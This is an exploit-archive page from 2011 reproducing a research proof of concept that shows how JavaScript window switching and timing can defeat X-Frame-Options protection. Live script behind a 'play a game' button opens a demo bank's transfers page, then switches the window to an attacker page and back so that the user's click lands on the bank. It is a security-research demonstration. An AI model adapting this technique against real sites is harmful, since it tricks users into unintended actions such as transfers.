Home / exploits ClickIt Proof Of Concept
Posted on 13 December 2011
<h3><i>X-Frame-Options</i> is worth less than you think</h3> <script> var w; var dummy; var it; // Precache stuff. x = new Image(); x.src = 'http://banking.beaver-peak.us/banking_interface/transfers/'; x2 = new Image(); x2.src = 'http://banking.beaver-peak.us/banking_interface/transfers/beaver-peak.jpg'; x3 = new Image(); x3.src = 'http://lcamtuf.coredump.cx/clickit/win.html'; x4 = new Image(); x4.src = 'http://lcamtuf.coredump.cx/clickit/win.jpg'; function prepare() { w = open('http://banking.beaver-peak.us/banking_interface/transfers/','_blank'); setTimeout(complete, 300); } function complete() { w.location.href = 'http://lcamtuf.coredump.cx/clickit/attacker.html'; setTimeout(goback, 1000); } function goback() { try { if (w.document.body.innerHTML == undefined) throw 1; setTimeout(goback, 100); } catch (e) { // That one case where prompts.tab_modal.enabled=true would have helped in Firefox... if (navigator.userAgent.indexOf('Firefox/') != -1) setTimeout('w.location.href = "http://lcamtuf.coredump.cx/clickit/win.html"', 1500); else setTimeout('w.location.href = "http://lcamtuf.coredump.cx/clickit/win.html"', 500); } } </script> <p> JavaScript allows you to exploit human cognitive abilities to a remarkable extent; tools such as window positioning, <code>history.forward()</code> and <code>history.back()</code>, open some scary possibilities that we are <a href="http://lcamtuf.blogspot.com/2011/12/x-frame-options-or-solving-wrong.html">completely unprepared to deal with</a>. This proof-of-concept aims to demonstrate this; while it is intentionally crude and makes no real effort to conceal its operation, the transitions <a href="http://lcamtuf.coredump.cx/switch/">can be made seamless</a> and very difficult to perceive. Very accurate click prediction can be achieved by carefully measuring mouse velocity and distance to destination, too. <p> I discuss these attacks and many other unsolved challenges in web app design in <i><a href="http://lcamtuf.coredump.cx/tangled/">"The Tangled Web"</a></i>. A similar approach poses a problem with many browser UIs; for that, <a href="http://lcamtuf.blogspot.com/2010/08/on-designing-uis-for-non-robots.html">check out this post</a>. <p> <input type=submit value="Click here to play a game" onclick="prepare()">
